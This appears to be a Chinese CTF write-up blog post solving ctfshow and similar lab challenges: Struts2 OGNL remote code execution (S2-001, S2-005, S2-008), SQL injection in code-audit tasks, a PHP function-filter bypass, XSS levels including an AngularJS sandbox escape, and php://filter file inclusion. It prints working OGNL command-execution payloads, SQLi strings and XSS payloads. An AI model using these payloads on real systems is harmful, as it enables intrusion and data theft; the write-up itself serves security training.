ctfshow刷题 [struts2]

目录

一、Web279-S2-001

二、Web280--S2-005

三、Web281--s2-008

四、Web301-代码审计

五、Web302-代码审计

六、Web303-代码审计

​七:网鼎杯:朱雀组开启靶机

八、Xss

九、Web78 文件包含


一、Web279-S2-001

 

题目分析:

如题s2-001是一个struts2命令执行漏洞编号
一、判断网站是否基于Struts2的方法
1、通过网页后缀来判断,如.do .action
2、判断 /struts/webconsole.html 是否存在来进行判断,需要 devMode 为 true
二、漏洞原理:


struts2漏洞 S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据

ctfshow刷题 [struts2]_第1张图片


测试提交加法表达式%{1+1}成功执行

ctfshow刷题 [struts2]_第2张图片

ctfshow刷题 [struts2]_第3张图片
三、OGNL表达式中三个符号 %,#,$ 的含义

%的用途是在标志的属性为字符串类型时,计算OGNL表达式%{}中的值

#的用途访主要是访问非根对象属性,因为Struts 2中值栈被视为根对象,所以访问其他非根对象时,需要加#前缀才可以调用,$主要是在Struts 2配置文件中,引用OGNL表达式

四、构造pyload:
/ 获取tomcat路径
%{"tomcatBinDir{"[email protected]@getProperty("user.dir")+"}"}

// 获取web路径

%{#[email protected]@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

ctfshow刷题 [struts2]_第4张图片

ctfshow刷题 [struts2]_第5张图片

// 命令执行 env,flag就在其中

password=%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}&username=1

ctfshow刷题 [struts2]_第6张图片显示语句

ctfshow刷题 [struts2]_第7张图片

————————————————

二、Web280--S2-005

如题:S2-005

ctfshow刷题 [struts2]_第8张图片
漏洞原理:


先看S2-003,Struts2将HTTP的每个参数名解析为ognl语句执行,而ognl表达式是通过#来访问struts的对象,Struts2框架虽然过滤了#来进行过滤,但是可以通过unicode编码(u0023)或8进制(43)绕过了安全限制,达到代码执行的效果

再看S2-005

S2-005和S2-003的原理是类似的,因为官方在修补S2-003不全面,导致用户可以绕过官方的安全配置(禁止静态方法调用和类方法执行),再次造成的漏洞,可以说是升级版的S2-005是升级版的S2-003
影响版本:Struts 2.0.0 - Struts 2.1.8.1
打不了,要用工具

Message /S2-005/example/HelloWorld.ac%3f%27%2B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29%2B%27%20tion

三、Web281--s2-008

打开环境

ctfshow刷题 [struts2]_第9张图片

 

执行任意代码poc:

ctfshow刷题 [struts2]_第10张图片

 


' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /proc/self/environ').getInputStream())) + '

执行在age框内回显:

LD_LIBRARY_PATH=/usr/local/tomcat/native-jni-lib�CATALINA_HOME=/usr/local/tomcat�LANG=C.UTF-8�HOSTNAME=a16ecdc45a95�OPENSSL_VERSION=1.1.0f-3�TOMCAT_VERSION=8.5.20�GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 713DA88BE50911535FE716F5208B0AB1D63011C7 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23�JAVA_HOME=/docker-java-home/jre�TOMCAT_NATIVE_LIBDIR=/usr/local/tomcat/native-jni-lib�TOMCAT_ASC_URL=https://www.apache.org/dist/tomcat/tomcat-8/v8.5.20/bin/apache-tomcat-8.5.20.tar.gz.asc�JAVA_VERSION=8u141�TOMCAT_TGZ_URL=https://www.apache.org/dyn/closer.cgi?action=download&filename=tomcat/tomcat-8/v8.5.20/bin/apache-tomcat-8.5.20.tar.gz�PWD=/usr/local/tomcat/webapps�HOME=/root�TOMCAT_TGZ_FALLBACK_URL=https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.20/bin/apache-tomcat-8.5.20.tar.gz�CA_CERTIFICATES_JAVA_VERSION=20170531+nmu1�TOMCAT_MAJOR=8�JAVA_DEBIAN_VERSION=8u141-b15-1~deb9u1�FLAG=ctfshow{8b021a84-b196-4292-b6d7-3a0a12d5f4e0}�SHLVL=0�TOMCAT_ASC_FALLBACK_URL=https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.20/bin/apache-tomcat-8.5.20.tar.gz.asc�PATH=/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin�

Flag:ctfshow{8b021a84-b196-4292-b6d7-3a0a12d5f4e0}


四、Web301-代码审计

1、代码审计思路:
        1、工具上Seaf搜索
        2、手工找敏感函数

解题分析:

ctfshow刷题 [struts2]_第11张图片

 

2、代码分析:
看一下目录,admin目录下都是静态页面,来到assets目录
我把重点放在了checklogin.php和fun.php

ctfshow刷题 [struts2]_第12张图片

ctfshow刷题 [struts2]_第13张图片 

 

Fun.php尝试全局搜索include  ,无

Checklogin
一看就感觉username有注入点,于是用sqlmap跑一下。使用burp抓包保存文件,然后sqlmap -r web301.txt,弹出的选项一路yes

ctfshow刷题 [struts2]_第14张图片 

跑出来时间盲注,但是感觉是代码审计不能光跑脚本

回到代码,在checklogin.php中没有对username做任何过滤,可以闭合它构造payload,且在第二个if中告诉我们只有通过sql语句查到的密码和我们的密码相同时才可以登录。

直接利用用户POST传入的userpwd与sql里面查出来的sds_password相等,login就可以为1了。

ctfshow刷题 [struts2]_第15张图片

3、构造pyload:
直接闭合,联合查询1,这样返回的密码是1了,最后只要登录的密码也为1就可以拿到flag了。
userid = 1' union select 1#
userpwd = 1

尝试一下:

ctfshow刷题 [struts2]_第16张图片
进来了

ctfshow刷题 [struts2]_第17张图片

 

 

五、Web302-代码审计

1、代码分析:

如图,修改了一个地方,给密码加密了。
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
这里是在上一道题的基础上进行了sds_decode,这个sds_decode就是之前看到的fun.php。
以看到,他的返回值是md5(md5($str.md5(base64_encode(“sds”))).“sds”)
因为知道str的值是1,所以自己加密之后再用上面的payload就行了
2、伪造一下exp。


最后加密得到的是d9c77c4e454869d5d8da3b4be79694d3

 

Pyload:
Userid:  ' union select 'd9c77c4e454869d5d8da3b4be79694d3';#
Passid:   1

ctfshow刷题 [struts2]_第18张图片

六、Web303-代码审计


1、代码分析:
这里换源码了,其中有一个sql文件,里面写了

ctfshow刷题 [struts2]_第19张图片

 

INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');

其次查看sds_decode,发现他正好也echo了sds_decode(‘admin’)的值,在传完之前的payload后,checklogin.php正好回显了admin加密后的值,也sql文件中的相等,说明账号密码就是admin/admin

ctfshow刷题 [struts2]_第20张图片

在dptadd.php中可以看出每个字段值都可控,所以我们可以在随便一个地方构造,这样它就会把我们想要查的东西插入到表中,最后我们再在dpt.php查看就可以了这里给了账号admin和密文


尝试一下:

ctfshow刷题 [struts2]_第21张图片


点击进入:

说明这个dptadd.php界面有注入点,无过滤的insert注入
2、构造pyload:
爆表:
dpt_name=5',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#ctfshow刷题 [struts2]_第22张图片

 

字段:
dpt_name=5',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#

ctfshow刷题 [struts2]_第23张图片

 

flag:
dpt_name=5',sds_address=(select flag from sds_fl9g)#

ctfshow刷题 [struts2]_第24张图片
七:网鼎杯:朱雀组
开启靶机

 

进入主页

ctfshow刷题 [struts2]_第25张图片

 

提示index.php有东西

ctfshow刷题 [struts2]_第26张图片

 

主页抓包看看
 这里提交了两个值,一个是func 值是date  另一个是p 值是 Y-m-d h:i:s,猜想一下,如果func的值是 system ,p的值是ls /flag呢?可以先用md5来校验一下是否能够成功执行

ctfshow刷题 [struts2]_第27张图片

 

方法一:in_array()函数进行绕过


 如果我们要读取flag这个文件的话,得先看看过滤了哪些函数:
这里可以利用file_get_contents获取index.php的源码
file_get_contents(path):读取path路径下文件的内容
读取到源码
 

 func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
?>


看样子过滤挺多的 ,是可以任意命令执行

in_array()函数进行绕过
直接构造payload:?func=\system&p=find / -name flag”
 1、加\是为了绕过过滤
2、system("find / -name flag"):查找所有文件名匹配flag的文件
或func=\exec&p=cat $(find / -name flag*)
 payload:?func=\system&p=cat /tmp/flagoefiu4r93     找到flag存在的路径

方法二:反序列化

然后进行cat 命令抓取flag
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

或者readfile读取flag文件
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

当然,我们也可以搞一个类似exp的payload,也可以得到flag。
func=readfile&p=/tmp/flagoefiu4r93

ctfshow刷题 [struts2]_第28张图片

 

八、Xss


第一关:常规xss
后缀+?username=

 

ctfshow刷题 [struts2]_第29张图片

第二关:简单闭合绕过
使用第一关的套路,直接被没有回显
http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level2?username=

ctfshow刷题 [struts2]_第30张图片

 

查看源码
发现使用了js所编写的一个过滤,username被escape加密

使用';结束前面的语句,后面加上函数alert(1);使用'1闭合后面的单引号,当然你也可以使用将其注释(//)
http://65c057a6-36f6-4ed7-90b8-1c25016edfec.node4.buuoj.cn/level2?username=1';alert(1);'1

ctfshow刷题 [struts2]_第31张图片


第三关:单引号转义
先测试

试试第二关的方法
';alert(1);'1
查看一下源代码,发现单引号(’)被转义

 ctfshow刷题 [struts2]_第32张图片


发现多了一个反斜杠+单引号(’),那么就相当于’'构成了闭合,那么我们的构造可以为:
'';alert(1);'1

ctfshow刷题 [struts2]_第33张图片 

第四关:伪链接
一直在循环,直接查看源码

ctfshow刷题 [struts2]_第34张图片

 

javascript:alert(1),浏览器会把javascript后面的内容当做代码执行,直接在当前页面执行。代码中接收jumpUrl作为跳转url,构造如下所示:

jumpUrl=javascript:alert(1)

ctfshow刷题 [struts2]_第35张图片

 

第五关:getQueryVariable()函数绕过
是一个表单查询,无论在输入框中输入,任意的东西,他都会回显报错

ctfshow刷题 [struts2]_第36张图片

 

http://1bbea037-ec4e-4120-bd60-16336bd00c60.node4.buuoj.cn/level5?autosubmit=1&action=JavaScript:alert(1);//

ctfshow刷题 [struts2]_第37张图片

 

分析代码:
变量1

​
​
if(getQueryVariable('autosubmit') !== false){  //如果出错就会执行getQueryVariable函数
            var autoForm = document.getElementById('autoForm');
            autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
            //变量action执行getQueryVariable函数
            autoForm.submit();
        }else{
            
        }
        function getQueryVariable(variable)
        {
               var query = window.location.search.substring(1);
               var vars = query.split("&");
               for (var i=0;i


变量2

getQueryVariable('autosubmit') !== false){  //如果出错就会执行getQueryVariable函数

autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');    //变量action执行getQueryVariable函数

绕过这两个变量就可以
?autosubmit=1&action=JavaScript:alert(1);//

第六关:xss模板注入(沙箱逃逸)

打开源码发现链接:

打开网站:https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js

F12打开是一长串段js编写的代码,怼这个URL,

测试xss模板注入,成功8*9=72,直接就给我算出了答案,说明存在xss模板注入的


8*9=72,直接就给我算出了答案,说明存在xss模板注入的

组件上发现js框架是angularjs框架

ctfshow刷题 [struts2]_第38张图片
百度一下Angular(版本号v1.4.0-v1.4.9)沙箱逃逸
Angular JS客户端模板注入
payload如下所示:
http://1bbea037-ec4e-4120-bd60-16336bd00c60.node4.buuoj.cn/level6?username={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

 ctfshow刷题 [struts2]_第39张图片


总结:
确认了存在xss模板注入以后,我们对Angular(版本号v1.4.0-v1.4.9)沙箱逃逸
进入下一关拿到flag

ctfshow刷题 [struts2]_第40张图片 

 

九、Web78 文件包含

源码:

ctfshow刷题 [struts2]_第41张图片

考察php伪协议


伪协议
php://伪协议是PHP提供的一些输 人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,内存中、磁盘备份的临时文件流,以及可以操作其他读取和写人文件资源的过滤器。


?file=php://filter/read=convert.base64-encode/resource=flag.php
php://filter是元封装器,设计用于数据流打开时的筛选过滤应用,对本地磁盘文件
进行读写。


PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3tlNGZiZDdhNi0zMzRkLTRhNzMtOWUzNC0xZjcwNDZmZGYxZGV9Ijs=
解码得flag

ctfshow刷题 [struts2]_第42张图片

你可能感兴趣的:(CTF学习,struts,servlet,java)